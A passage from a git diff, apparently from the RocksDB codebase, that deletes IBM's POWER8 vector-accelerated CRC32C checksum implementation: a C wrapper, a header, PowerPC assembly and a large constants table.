VMX_ALIGN - ((unsigned long)data & VMX_ALIGN_MASK); - crc = crc32_align(crc, data, prealign); - len -= prealign; - data += prealign; - } - - crc = __crc32_vpmsum(crc, data, (unsigned long)len & ~VMX_ALIGN_MASK); - - tail = len & VMX_ALIGN_MASK; - if (tail) { - data += len & ~VMX_ALIGN_MASK; - crc = crc32_align(crc, data, tail); - } - -out: -#ifdef CRC_XOR - crc ^= 0xffffffff; -#endif - - return crc; -} - -/* This wrapper function works around the fact that crc32_vpmsum - * does not gracefully handle the case where the data pointer is NULL. There - * may be room for performance improvement here. 
- */ -uint32_t crc32c_ppc(uint32_t crc, unsigned char const *data, unsigned len) { - unsigned char *buf2; - - if (!data) { - buf2 = (unsigned char *)malloc(len); - bzero(buf2, len); - crc = crc32_vpmsum(crc, buf2, len); - free(buf2); - } else { - crc = crc32_vpmsum(crc, data, (unsigned long)len); - } - return crc; -} - -#else /* HAVE_POWER8 */ - -/* This symbol has to exist on non-ppc architectures (and on legacy - * ppc systems using power7 or below) in order to compile properly - * there, even though it won't be called. - */ -uint32_t crc32c_ppc(uint32_t crc, unsigned char const *data, unsigned len) { - return 0; -} - -#endif /* HAVE_POWER8 */ diff --git a/util/crc32c_ppc.h b/util/crc32c_ppc.h deleted file mode 100644 index b52ad9b2a42..00000000000 --- a/util/crc32c_ppc.h +++ /dev/null @@ -1,23 +0,0 @@ -// Copyright (c) 2017 International Business Machines Corp. -// All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. - -#ifndef CRC32C_PPC_H -#define CRC32C_PPC_H - -#ifdef __cplusplus -extern "C" { -#endif - -extern uint32_t crc32c_ppc(uint32_t crc, unsigned char const *buffer, - unsigned len); - -#ifdef __cplusplus -} -#endif - -#endif diff --git a/util/crc32c_ppc_asm.S b/util/crc32c_ppc_asm.S deleted file mode 100644 index 6de79797335..00000000000 --- a/util/crc32c_ppc_asm.S +++ /dev/null @@ -1,753 +0,0 @@ -// Copyright (c) 2015 Anton Blanchard , IBM -// Copyright (c) 2017 International Business Machines Corp. -// All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. 
- -#include -#include "ppc-opcode.h" - -#undef toc - -#ifndef r1 -#define r1 1 -#endif - -#ifndef r2 -#define r2 2 -#endif - - .section .rodata -.balign 16 - -.byteswap_constant: - /* byte reverse permute constant */ - .octa 0x0F0E0D0C0B0A09080706050403020100 - -#define __ASSEMBLY__ -#include "crc32c_ppc_constants.h" - - .text - -#if defined(__BIG_ENDIAN__) && defined(REFLECT) -#define BYTESWAP_DATA -#elif defined(__LITTLE_ENDIAN__) && !defined(REFLECT) -#define BYTESWAP_DATA -#else -#undef BYTESWAP_DATA -#endif - -#define off16 r25 -#define off32 r26 -#define off48 r27 -#define off64 r28 -#define off80 r29 -#define off96 r30 -#define off112 r31 - -#define const1 v24 -#define const2 v25 - -#define byteswap v26 -#define mask_32bit v27 -#define mask_64bit v28 -#define zeroes v29 - -#ifdef BYTESWAP_DATA -#define VPERM(A, B, C, D) vperm A, B, C, D -#else -#define VPERM(A, B, C, D) -#endif - -/* unsigned int __crc32_vpmsum(unsigned int crc, void *p, unsigned long len) */ -FUNC_START(__crc32_vpmsum) - std r31,-8(r1) - std r30,-16(r1) - std r29,-24(r1) - std r28,-32(r1) - std r27,-40(r1) - std r26,-48(r1) - std r25,-56(r1) - - li off16,16 - li off32,32 - li off48,48 - li off64,64 - li off80,80 - li off96,96 - li off112,112 - li r0,0 - - /* Enough room for saving 10 non volatile VMX registers */ - subi r6,r1,56+10*16 - subi r7,r1,56+2*16 - - stvx v20,0,r6 - stvx v21,off16,r6 - stvx v22,off32,r6 - stvx v23,off48,r6 - stvx v24,off64,r6 - stvx v25,off80,r6 - stvx v26,off96,r6 - stvx v27,off112,r6 - stvx v28,0,r7 - stvx v29,off16,r7 - - mr r10,r3 - - vxor zeroes,zeroes,zeroes - vspltisw v0,-1 - - vsldoi mask_32bit,zeroes,v0,4 - vsldoi mask_64bit,zeroes,v0,8 - - /* Get the initial value into v8 */ - vxor v8,v8,v8 - MTVRD(v8, r3) -#ifdef REFLECT - vsldoi v8,zeroes,v8,8 /* shift into bottom 32 bits */ -#else - vsldoi v8,v8,zeroes,4 /* shift into top 32 bits */ -#endif - -#ifdef BYTESWAP_DATA - addis r3,r2,.byteswap_constant@toc@ha - addi r3,r3,.byteswap_constant@toc@l - - lvx byteswap,0,r3 - addi r3,r3,16 -#endif - - cmpdi r5,256 - blt .Lshort - - rldicr r6,r5,0,56 - - /* Checksum in blocks of MAX_SIZE */ -1: lis r7,MAX_SIZE@h - ori r7,r7,MAX_SIZE@l - mr r9,r7 - cmpd r6,r7 - bgt 2f - mr r7,r6 -2: subf r6,r7,r6 - - /* our main loop does 128 bytes at a time */ - srdi r7,r7,7 - - /* - * Work out the offset into the constants table to start at. Each - * constant is 16 bytes, and it is used against 128 bytes of input - * data - 128 / 16 = 8 - */ - sldi r8,r7,4 - srdi r9,r9,3 - subf r8,r8,r9 - - /* We reduce our final 128 bytes in a separate step */ - addi r7,r7,-1 - mtctr r7 - - addis r3,r2,.constants@toc@ha - addi r3,r3,.constants@toc@l - - /* Find the start of our constants */ - add r3,r3,r8 - - /* zero v0-v7 which will contain our checksums */ - vxor v0,v0,v0 - vxor v1,v1,v1 - vxor v2,v2,v2 - vxor v3,v3,v3 - vxor v4,v4,v4 - vxor v5,v5,v5 - vxor v6,v6,v6 - vxor v7,v7,v7 - - lvx const1,0,r3 - - /* - * If we are looping back to consume more data we use the values - * already in v16-v23. 
- */ - cmpdi r0,1 - beq 2f - - /* First warm up pass */ - lvx v16,0,r4 - lvx v17,off16,r4 - VPERM(v16,v16,v16,byteswap) - VPERM(v17,v17,v17,byteswap) - lvx v18,off32,r4 - lvx v19,off48,r4 - VPERM(v18,v18,v18,byteswap) - VPERM(v19,v19,v19,byteswap) - lvx v20,off64,r4 - lvx v21,off80,r4 - VPERM(v20,v20,v20,byteswap) - VPERM(v21,v21,v21,byteswap) - lvx v22,off96,r4 - lvx v23,off112,r4 - VPERM(v22,v22,v22,byteswap) - VPERM(v23,v23,v23,byteswap) - addi r4,r4,8*16 - - /* xor in initial value */ - vxor v16,v16,v8 - -2: bdz .Lfirst_warm_up_done - - addi r3,r3,16 - lvx const2,0,r3 - - /* Second warm up pass */ - VPMSUMD(v8,v16,const1) - lvx v16,0,r4 - VPERM(v16,v16,v16,byteswap) - ori r2,r2,0 - - VPMSUMD(v9,v17,const1) - lvx v17,off16,r4 - VPERM(v17,v17,v17,byteswap) - ori r2,r2,0 - - VPMSUMD(v10,v18,const1) - lvx v18,off32,r4 - VPERM(v18,v18,v18,byteswap) - ori r2,r2,0 - - VPMSUMD(v11,v19,const1) - lvx v19,off48,r4 - VPERM(v19,v19,v19,byteswap) - ori r2,r2,0 - - VPMSUMD(v12,v20,const1) - lvx v20,off64,r4 - VPERM(v20,v20,v20,byteswap) - ori r2,r2,0 - - VPMSUMD(v13,v21,const1) - lvx v21,off80,r4 - VPERM(v21,v21,v21,byteswap) - ori r2,r2,0 - - VPMSUMD(v14,v22,const1) - lvx v22,off96,r4 - VPERM(v22,v22,v22,byteswap) - ori r2,r2,0 - - VPMSUMD(v15,v23,const1) - lvx v23,off112,r4 - VPERM(v23,v23,v23,byteswap) - - addi r4,r4,8*16 - - bdz .Lfirst_cool_down - - /* - * main loop. We modulo schedule it such that it takes three iterations - * to complete - first iteration load, second iteration vpmsum, third - * iteration xor. - */ - .balign 16 -4: lvx const1,0,r3 - addi r3,r3,16 - ori r2,r2,0 - - vxor v0,v0,v8 - VPMSUMD(v8,v16,const2) - lvx v16,0,r4 - VPERM(v16,v16,v16,byteswap) - ori r2,r2,0 - - vxor v1,v1,v9 - VPMSUMD(v9,v17,const2) - lvx v17,off16,r4 - VPERM(v17,v17,v17,byteswap) - ori r2,r2,0 - - vxor v2,v2,v10 - VPMSUMD(v10,v18,const2) - lvx v18,off32,r4 - VPERM(v18,v18,v18,byteswap) - ori r2,r2,0 - - vxor v3,v3,v11 - VPMSUMD(v11,v19,const2) - lvx v19,off48,r4 - VPERM(v19,v19,v19,byteswap) - lvx const2,0,r3 - ori r2,r2,0 - - vxor v4,v4,v12 - VPMSUMD(v12,v20,const1) - lvx v20,off64,r4 - VPERM(v20,v20,v20,byteswap) - ori r2,r2,0 - - vxor v5,v5,v13 - VPMSUMD(v13,v21,const1) - lvx v21,off80,r4 - VPERM(v21,v21,v21,byteswap) - ori r2,r2,0 - - vxor v6,v6,v14 - VPMSUMD(v14,v22,const1) - lvx v22,off96,r4 - VPERM(v22,v22,v22,byteswap) - ori r2,r2,0 - - vxor v7,v7,v15 - VPMSUMD(v15,v23,const1) - lvx v23,off112,r4 - VPERM(v23,v23,v23,byteswap) - - addi r4,r4,8*16 - - bdnz 4b - -.Lfirst_cool_down: - /* First cool down pass */ - lvx const1,0,r3 - addi r3,r3,16 - - vxor v0,v0,v8 - VPMSUMD(v8,v16,const1) - ori r2,r2,0 - - vxor v1,v1,v9 - VPMSUMD(v9,v17,const1) - ori r2,r2,0 - - vxor v2,v2,v10 - VPMSUMD(v10,v18,const1) - ori r2,r2,0 - - vxor v3,v3,v11 - VPMSUMD(v11,v19,const1) - ori r2,r2,0 - - vxor v4,v4,v12 - VPMSUMD(v12,v20,const1) - ori r2,r2,0 - - vxor v5,v5,v13 - VPMSUMD(v13,v21,const1) - ori r2,r2,0 - - vxor v6,v6,v14 - VPMSUMD(v14,v22,const1) - ori r2,r2,0 - - vxor v7,v7,v15 - VPMSUMD(v15,v23,const1) - ori r2,r2,0 - -.Lsecond_cool_down: - /* Second cool down pass */ - vxor v0,v0,v8 - vxor v1,v1,v9 - vxor v2,v2,v10 - vxor v3,v3,v11 - vxor v4,v4,v12 - vxor v5,v5,v13 - vxor v6,v6,v14 - vxor v7,v7,v15 - -#ifdef REFLECT - /* - * vpmsumd produces a 96 bit result in the least significant bits - * of the register. Since we are bit reflected we have to shift it - * left 32 bits so it occupies the least significant bits in the - * bit reflected domain. 
- */ - vsldoi v0,v0,zeroes,4 - vsldoi v1,v1,zeroes,4 - vsldoi v2,v2,zeroes,4 - vsldoi v3,v3,zeroes,4 - vsldoi v4,v4,zeroes,4 - vsldoi v5,v5,zeroes,4 - vsldoi v6,v6,zeroes,4 - vsldoi v7,v7,zeroes,4 -#endif - - /* xor with last 1024 bits */ - lvx v8,0,r4 - lvx v9,off16,r4 - VPERM(v8,v8,v8,byteswap) - VPERM(v9,v9,v9,byteswap) - lvx v10,off32,r4 - lvx v11,off48,r4 - VPERM(v10,v10,v10,byteswap) - VPERM(v11,v11,v11,byteswap) - lvx v12,off64,r4 - lvx v13,off80,r4 - VPERM(v12,v12,v12,byteswap) - VPERM(v13,v13,v13,byteswap) - lvx v14,off96,r4 - lvx v15,off112,r4 - VPERM(v14,v14,v14,byteswap) - VPERM(v15,v15,v15,byteswap) - - addi r4,r4,8*16 - - vxor v16,v0,v8 - vxor v17,v1,v9 - vxor v18,v2,v10 - vxor v19,v3,v11 - vxor v20,v4,v12 - vxor v21,v5,v13 - vxor v22,v6,v14 - vxor v23,v7,v15 - - li r0,1 - cmpdi r6,0 - addi r6,r6,128 - bne 1b - - /* Work out how many bytes we have left */ - andi. r5,r5,127 - - /* Calculate where in the constant table we need to start */ - subfic r6,r5,128 - add r3,r3,r6 - - /* How many 16 byte chunks are in the tail */ - srdi r7,r5,4 - mtctr r7 - - /* - * Reduce the previously calculated 1024 bits to 64 bits, shifting - * 32 bits to include the trailing 32 bits of zeros - */ - lvx v0,0,r3 - lvx v1,off16,r3 - lvx v2,off32,r3 - lvx v3,off48,r3 - lvx v4,off64,r3 - lvx v5,off80,r3 - lvx v6,off96,r3 - lvx v7,off112,r3 - addi r3,r3,8*16 - - VPMSUMW(v0,v16,v0) - VPMSUMW(v1,v17,v1) - VPMSUMW(v2,v18,v2) - VPMSUMW(v3,v19,v3) - VPMSUMW(v4,v20,v4) - VPMSUMW(v5,v21,v5) - VPMSUMW(v6,v22,v6) - VPMSUMW(v7,v23,v7) - - /* Now reduce the tail (0 - 112 bytes) */ - cmpdi r7,0 - beq 1f - - lvx v16,0,r4 - lvx v17,0,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - bdz 1f - - lvx v16,off16,r4 - lvx v17,off16,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - bdz 1f - - lvx v16,off32,r4 - lvx v17,off32,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - bdz 1f - - lvx v16,off48,r4 - lvx v17,off48,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - bdz 1f - - lvx v16,off64,r4 - lvx v17,off64,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - bdz 1f - - lvx v16,off80,r4 - lvx v17,off80,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - bdz 1f - - lvx v16,off96,r4 - lvx v17,off96,r3 - VPERM(v16,v16,v16,byteswap) - VPMSUMW(v16,v16,v17) - vxor v0,v0,v16 - - /* Now xor all the parallel chunks together */ -1: vxor v0,v0,v1 - vxor v2,v2,v3 - vxor v4,v4,v5 - vxor v6,v6,v7 - - vxor v0,v0,v2 - vxor v4,v4,v6 - - vxor v0,v0,v4 - -.Lbarrett_reduction: - /* Barrett constants */ - addis r3,r2,.barrett_constants@toc@ha - addi r3,r3,.barrett_constants@toc@l - - lvx const1,0,r3 - lvx const2,off16,r3 - - vsldoi v1,v0,v0,8 - vxor v0,v0,v1 /* xor two 64 bit results together */ - -#ifdef REFLECT - /* shift left one bit */ - vspltisb v1,1 - vsl v0,v0,v1 -#endif - - vand v0,v0,mask_64bit - -#ifndef REFLECT - /* - * Now for the Barrett reduction algorithm. The idea is to calculate q, - * the multiple of our polynomial that we need to subtract. By - * doing the computation 2x bits higher (ie 64 bits) and shifting the - * result back down 2x bits, we round down to the nearest multiple. - */ - VPMSUMD(v1,v0,const1) /* ma */ - vsldoi v1,zeroes,v1,8 /* q = floor(ma/(2^64)) */ - VPMSUMD(v1,v1,const2) /* qn */ - vxor v0,v0,v1 /* a - qn, subtraction is xor in GF(2) */ - - /* - * Get the result into r3. 
We need to shift it left 8 bytes: - * V0 [ 0 1 2 X ] - * V0 [ 0 X 2 3 ] - */ - vsldoi v0,v0,zeroes,8 /* shift result into top 64 bits */ -#else - /* - * The reflected version of Barrett reduction. Instead of bit - * reflecting our data (which is expensive to do), we bit reflect our - * constants and our algorithm, which means the intermediate data in - * our vector registers goes from 0-63 instead of 63-0. We can reflect - * the algorithm because we don't carry in mod 2 arithmetic. - */ - vand v1,v0,mask_32bit /* bottom 32 bits of a */ - VPMSUMD(v1,v1,const1) /* ma */ - vand v1,v1,mask_32bit /* bottom 32bits of ma */ - VPMSUMD(v1,v1,const2) /* qn */ - vxor v0,v0,v1 /* a - qn, subtraction is xor in GF(2) */ - - /* - * Since we are bit reflected, the result (ie the low 32 bits) is in - * the high 32 bits. We just need to shift it left 4 bytes - * V0 [ 0 1 X 3 ] - * V0 [ 0 X 2 3 ] - */ - vsldoi v0,v0,zeroes,4 /* shift result into top 64 bits of */ -#endif - - /* Get it into r3 */ - MFVRD(r3, v0) - -.Lout: - subi r6,r1,56+10*16 - subi r7,r1,56+2*16 - - lvx v20,0,r6 - lvx v21,off16,r6 - lvx v22,off32,r6 - lvx v23,off48,r6 - lvx v24,off64,r6 - lvx v25,off80,r6 - lvx v26,off96,r6 - lvx v27,off112,r6 - lvx v28,0,r7 - lvx v29,off16,r7 - - ld r31,-8(r1) - ld r30,-16(r1) - ld r29,-24(r1) - ld r28,-32(r1) - ld r27,-40(r1) - ld r26,-48(r1) - ld r25,-56(r1) - - blr - -.Lfirst_warm_up_done: - lvx const1,0,r3 - addi r3,r3,16 - - VPMSUMD(v8,v16,const1) - VPMSUMD(v9,v17,const1) - VPMSUMD(v10,v18,const1) - VPMSUMD(v11,v19,const1) - VPMSUMD(v12,v20,const1) - VPMSUMD(v13,v21,const1) - VPMSUMD(v14,v22,const1) - VPMSUMD(v15,v23,const1) - - b .Lsecond_cool_down - -.Lshort: - cmpdi r5,0 - beq .Lzero - - addis r3,r2,.short_constants@toc@ha - addi r3,r3,.short_constants@toc@l - - /* Calculate where in the constant table we need to start */ - subfic r6,r5,256 - add r3,r3,r6 - - /* How many 16 byte chunks? 
*/ - srdi r7,r5,4 - mtctr r7 - - vxor v19,v19,v19 - vxor v20,v20,v20 - - lvx v0,0,r4 - lvx v16,0,r3 - VPERM(v0,v0,v16,byteswap) - vxor v0,v0,v8 /* xor in initial value */ - VPMSUMW(v0,v0,v16) - bdz .Lv0 - - lvx v1,off16,r4 - lvx v17,off16,r3 - VPERM(v1,v1,v17,byteswap) - VPMSUMW(v1,v1,v17) - bdz .Lv1 - - lvx v2,off32,r4 - lvx v16,off32,r3 - VPERM(v2,v2,v16,byteswap) - VPMSUMW(v2,v2,v16) - bdz .Lv2 - - lvx v3,off48,r4 - lvx v17,off48,r3 - VPERM(v3,v3,v17,byteswap) - VPMSUMW(v3,v3,v17) - bdz .Lv3 - - lvx v4,off64,r4 - lvx v16,off64,r3 - VPERM(v4,v4,v16,byteswap) - VPMSUMW(v4,v4,v16) - bdz .Lv4 - - lvx v5,off80,r4 - lvx v17,off80,r3 - VPERM(v5,v5,v17,byteswap) - VPMSUMW(v5,v5,v17) - bdz .Lv5 - - lvx v6,off96,r4 - lvx v16,off96,r3 - VPERM(v6,v6,v16,byteswap) - VPMSUMW(v6,v6,v16) - bdz .Lv6 - - lvx v7,off112,r4 - lvx v17,off112,r3 - VPERM(v7,v7,v17,byteswap) - VPMSUMW(v7,v7,v17) - bdz .Lv7 - - addi r3,r3,128 - addi r4,r4,128 - - lvx v8,0,r4 - lvx v16,0,r3 - VPERM(v8,v8,v16,byteswap) - VPMSUMW(v8,v8,v16) - bdz .Lv8 - - lvx v9,off16,r4 - lvx v17,off16,r3 - VPERM(v9,v9,v17,byteswap) - VPMSUMW(v9,v9,v17) - bdz .Lv9 - - lvx v10,off32,r4 - lvx v16,off32,r3 - VPERM(v10,v10,v16,byteswap) - VPMSUMW(v10,v10,v16) - bdz .Lv10 - - lvx v11,off48,r4 - lvx v17,off48,r3 - VPERM(v11,v11,v17,byteswap) - VPMSUMW(v11,v11,v17) - bdz .Lv11 - - lvx v12,off64,r4 - lvx v16,off64,r3 - VPERM(v12,v12,v16,byteswap) - VPMSUMW(v12,v12,v16) - bdz .Lv12 - - lvx v13,off80,r4 - lvx v17,off80,r3 - VPERM(v13,v13,v17,byteswap) - VPMSUMW(v13,v13,v17) - bdz .Lv13 - - lvx v14,off96,r4 - lvx v16,off96,r3 - VPERM(v14,v14,v16,byteswap) - VPMSUMW(v14,v14,v16) - bdz .Lv14 - - lvx v15,off112,r4 - lvx v17,off112,r3 - VPERM(v15,v15,v17,byteswap) - VPMSUMW(v15,v15,v17) - -.Lv15: vxor v19,v19,v15 -.Lv14: vxor v20,v20,v14 -.Lv13: vxor v19,v19,v13 -.Lv12: vxor v20,v20,v12 -.Lv11: vxor v19,v19,v11 -.Lv10: vxor v20,v20,v10 -.Lv9: vxor v19,v19,v9 -.Lv8: vxor v20,v20,v8 -.Lv7: vxor v19,v19,v7 -.Lv6: vxor v20,v20,v6 -.Lv5: vxor v19,v19,v5 -.Lv4: vxor v20,v20,v4 -.Lv3: vxor v19,v19,v3 -.Lv2: vxor v20,v20,v2 -.Lv1: vxor v19,v19,v1 -.Lv0: vxor v20,v20,v0 - - vxor v0,v19,v20 - - b .Lbarrett_reduction - -.Lzero: - mr r3,r10 - b .Lout - -FUNC_END(__crc32_vpmsum) diff --git a/util/crc32c_ppc_constants.h b/util/crc32c_ppc_constants.h deleted file mode 100644 index aa5ea98f8e2..00000000000 --- a/util/crc32c_ppc_constants.h +++ /dev/null @@ -1,893 +0,0 @@ -// Copyright (C) 2015, 2017 International Business Machines Corp. -// All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. 
-#ifndef CRC32C_PPC_CONST_H -#define CRC32C_PPC_CONST_H -#define CRC 0x1edc6f41 -#define REFLECT -#define CRC_XOR - -#ifndef __ASSEMBLY__ -#ifdef CRC_TABLE -static const unsigned int crc_table[] = { - 0x00000000, 0xf26b8303, 0xe13b70f7, 0x1350f3f4, 0xc79a971f, 0x35f1141c, - 0x26a1e7e8, 0xd4ca64eb, 0x8ad958cf, 0x78b2dbcc, 0x6be22838, 0x9989ab3b, - 0x4d43cfd0, 0xbf284cd3, 0xac78bf27, 0x5e133c24, 0x105ec76f, 0xe235446c, - 0xf165b798, 0x030e349b, 0xd7c45070, 0x25afd373, 0x36ff2087, 0xc494a384, - 0x9a879fa0, 0x68ec1ca3, 0x7bbcef57, 0x89d76c54, 0x5d1d08bf, 0xaf768bbc, - 0xbc267848, 0x4e4dfb4b, 0x20bd8ede, 0xd2d60ddd, 0xc186fe29, 0x33ed7d2a, - 0xe72719c1, 0x154c9ac2, 0x061c6936, 0xf477ea35, 0xaa64d611, 0x580f5512, - 0x4b5fa6e6, 0xb93425e5, 0x6dfe410e, 0x9f95c20d, 0x8cc531f9, 0x7eaeb2fa, - 0x30e349b1, 0xc288cab2, 0xd1d83946, 0x23b3ba45, 0xf779deae, 0x05125dad, - 0x1642ae59, 0xe4292d5a, 0xba3a117e, 0x4851927d, 0x5b016189, 0xa96ae28a, - 0x7da08661, 0x8fcb0562, 0x9c9bf696, 0x6ef07595, 0x417b1dbc, 0xb3109ebf, - 0xa0406d4b, 0x522bee48, 0x86e18aa3, 0x748a09a0, 0x67dafa54, 0x95b17957, - 0xcba24573, 0x39c9c670, 0x2a993584, 0xd8f2b687, 0x0c38d26c, 0xfe53516f, - 0xed03a29b, 0x1f682198, 0x5125dad3, 0xa34e59d0, 0xb01eaa24, 0x42752927, - 0x96bf4dcc, 0x64d4cecf, 0x77843d3b, 0x85efbe38, 0xdbfc821c, 0x2997011f, - 0x3ac7f2eb, 0xc8ac71e8, 0x1c661503, 0xee0d9600, 0xfd5d65f4, 0x0f36e6f7, - 0x61c69362, 0x93ad1061, 0x80fde395, 0x72966096, 0xa65c047d, 0x5437877e, - 0x4767748a, 0xb50cf789, 0xeb1fcbad, 0x197448ae, 0x0a24bb5a, 0xf84f3859, - 0x2c855cb2, 0xdeeedfb1, 0xcdbe2c45, 0x3fd5af46, 0x7198540d, 0x83f3d70e, - 0x90a324fa, 0x62c8a7f9, 0xb602c312, 0x44694011, 0x5739b3e5, 0xa55230e6, - 0xfb410cc2, 0x092a8fc1, 0x1a7a7c35, 0xe811ff36, 0x3cdb9bdd, 0xceb018de, - 0xdde0eb2a, 0x2f8b6829, 0x82f63b78, 0x709db87b, 0x63cd4b8f, 0x91a6c88c, - 0x456cac67, 0xb7072f64, 0xa457dc90, 0x563c5f93, 0x082f63b7, 0xfa44e0b4, - 0xe9141340, 0x1b7f9043, 0xcfb5f4a8, 0x3dde77ab, 0x2e8e845f, 0xdce5075c, - 0x92a8fc17, 0x60c37f14, 0x73938ce0, 0x81f80fe3, 0x55326b08, 0xa759e80b, - 0xb4091bff, 0x466298fc, 0x1871a4d8, 0xea1a27db, 0xf94ad42f, 0x0b21572c, - 0xdfeb33c7, 0x2d80b0c4, 0x3ed04330, 0xccbbc033, 0xa24bb5a6, 0x502036a5, - 0x4370c551, 0xb11b4652, 0x65d122b9, 0x97baa1ba, 0x84ea524e, 0x7681d14d, - 0x2892ed69, 0xdaf96e6a, 0xc9a99d9e, 0x3bc21e9d, 0xef087a76, 0x1d63f975, - 0x0e330a81, 0xfc588982, 0xb21572c9, 0x407ef1ca, 0x532e023e, 0xa145813d, - 0x758fe5d6, 0x87e466d5, 0x94b49521, 0x66df1622, 0x38cc2a06, 0xcaa7a905, - 0xd9f75af1, 0x2b9cd9f2, 0xff56bd19, 0x0d3d3e1a, 0x1e6dcdee, 0xec064eed, - 0xc38d26c4, 0x31e6a5c7, 0x22b65633, 0xd0ddd530, 0x0417b1db, 0xf67c32d8, - 0xe52cc12c, 0x1747422f, 0x49547e0b, 0xbb3ffd08, 0xa86f0efc, 0x5a048dff, - 0x8ecee914, 0x7ca56a17, 0x6ff599e3, 0x9d9e1ae0, 0xd3d3e1ab, 0x21b862a8, - 0x32e8915c, 0xc083125f, 0x144976b4, 0xe622f5b7, 0xf5720643, 0x07198540, - 0x590ab964, 0xab613a67, 0xb831c993, 0x4a5a4a90, 0x9e902e7b, 0x6cfbad78, - 0x7fab5e8c, 0x8dc0dd8f, 0xe330a81a, 0x115b2b19, 0x020bd8ed, 0xf0605bee, - 0x24aa3f05, 0xd6c1bc06, 0xc5914ff2, 0x37faccf1, 0x69e9f0d5, 0x9b8273d6, - 0x88d28022, 0x7ab90321, 0xae7367ca, 0x5c18e4c9, 0x4f48173d, 0xbd23943e, - 0xf36e6f75, 0x0105ec76, 0x12551f82, 0xe03e9c81, 0x34f4f86a, 0xc69f7b69, - 0xd5cf889d, 0x27a40b9e, 0x79b737ba, 0x8bdcb4b9, 0x988c474d, 0x6ae7c44e, - 0xbe2da0a5, 0x4c4623a6, 0x5f16d052, 0xad7d5351, -}; - -#endif - -#else -#define MAX_SIZE 32768 -.constants : - - /* Reduce 262144 kbits to 1024 bits */ - /* x^261120 mod p(x)` << 1, x^261184 mod p(x)` << 1 */ - .octa 
0x00000000b6ca9e20000000009c37c408 - - /* x^260096 mod p(x)` << 1, x^260160 mod p(x)` << 1 */ - .octa 0x00000000350249a800000001b51df26c - - /* x^259072 mod p(x)` << 1, x^259136 mod p(x)` << 1 */ - .octa 0x00000001862dac54000000000724b9d0 - - /* x^258048 mod p(x)` << 1, x^258112 mod p(x)` << 1 */ - .octa 0x00000001d87fb48c00000001c00532fe - - /* x^257024 mod p(x)` << 1, x^257088 mod p(x)` << 1 */ - .octa 0x00000001f39b699e00000000f05a9362 - - /* x^256000 mod p(x)` << 1, x^256064 mod p(x)` << 1 */ - .octa 0x0000000101da11b400000001e1007970 - - /* x^254976 mod p(x)` << 1, x^255040 mod p(x)` << 1 */ - .octa 0x00000001cab571e000000000a57366ee - - /* x^253952 mod p(x)` << 1, x^254016 mod p(x)` << 1 */ - .octa 0x00000000c7020cfe0000000192011284 - - /* x^252928 mod p(x)` << 1, x^252992 mod p(x)` << 1 */ - .octa 0x00000000cdaed1ae0000000162716d9a - - /* x^251904 mod p(x)` << 1, x^251968 mod p(x)` << 1 */ - .octa 0x00000001e804effc00000000cd97ecde - - /* x^250880 mod p(x)` << 1, x^250944 mod p(x)` << 1 */ - .octa 0x0000000077c3ea3a0000000058812bc0 - - /* x^249856 mod p(x)` << 1, x^249920 mod p(x)` << 1 */ - .octa 0x0000000068df31b40000000088b8c12e - - /* x^248832 mod p(x)` << 1, x^248896 mod p(x)` << 1 */ - .octa 0x00000000b059b6c200000001230b234c - - /* x^247808 mod p(x)` << 1, x^247872 mod p(x)` << 1 */ - .octa 0x0000000145fb8ed800000001120b416e - - /* x^246784 mod p(x)` << 1, x^246848 mod p(x)` << 1 */ - .octa 0x00000000cbc0916800000001974aecb0 - - /* x^245760 mod p(x)` << 1, x^245824 mod p(x)` << 1 */ - .octa 0x000000005ceeedc2000000008ee3f226 - - /* x^244736 mod p(x)` << 1, x^244800 mod p(x)` << 1 */ - .octa 0x0000000047d74e8600000001089aba9a - - /* x^243712 mod p(x)` << 1, x^243776 mod p(x)` << 1 */ - .octa 0x00000001407e9e220000000065113872 - - /* x^242688 mod p(x)` << 1, x^242752 mod p(x)` << 1 */ - .octa 0x00000001da967bda000000005c07ec10 - - /* x^241664 mod p(x)` << 1, x^241728 mod p(x)` << 1 */ - .octa 0x000000006c8983680000000187590924 - - /* x^240640 mod p(x)` << 1, x^240704 mod p(x)` << 1 */ - .octa 0x00000000f2d14c9800000000e35da7c6 - - /* x^239616 mod p(x)` << 1, x^239680 mod p(x)` << 1 */ - .octa 0x00000001993c6ad4000000000415855a - - /* x^238592 mod p(x)` << 1, x^238656 mod p(x)` << 1 */ - .octa 0x000000014683d1ac0000000073617758 - - /* x^237568 mod p(x)` << 1, x^237632 mod p(x)` << 1 */ - .octa 0x00000001a7c93e6c0000000176021d28 - - /* x^236544 mod p(x)` << 1, x^236608 mod p(x)` << 1 */ - .octa 0x000000010211e90a00000001c358fd0a - - /* x^235520 mod p(x)` << 1, x^235584 mod p(x)` << 1 */ - .octa 0x000000001119403e00000001ff7a2c18 - - /* x^234496 mod p(x)` << 1, x^234560 mod p(x)` << 1 */ - .octa 0x000000001c3261aa00000000f2d9f7e4 - - /* x^233472 mod p(x)` << 1, x^233536 mod p(x)` << 1 */ - .octa 0x000000014e37a634000000016cf1f9c8 - - /* x^232448 mod p(x)` << 1, x^232512 mod p(x)` << 1 */ - .octa 0x0000000073786c0c000000010af9279a - - /* x^231424 mod p(x)` << 1, x^231488 mod p(x)` << 1 */ - .octa 0x000000011dc037f80000000004f101e8 - - /* x^230400 mod p(x)` << 1, x^230464 mod p(x)` << 1 */ - .octa 0x0000000031433dfc0000000070bcf184 - - /* x^229376 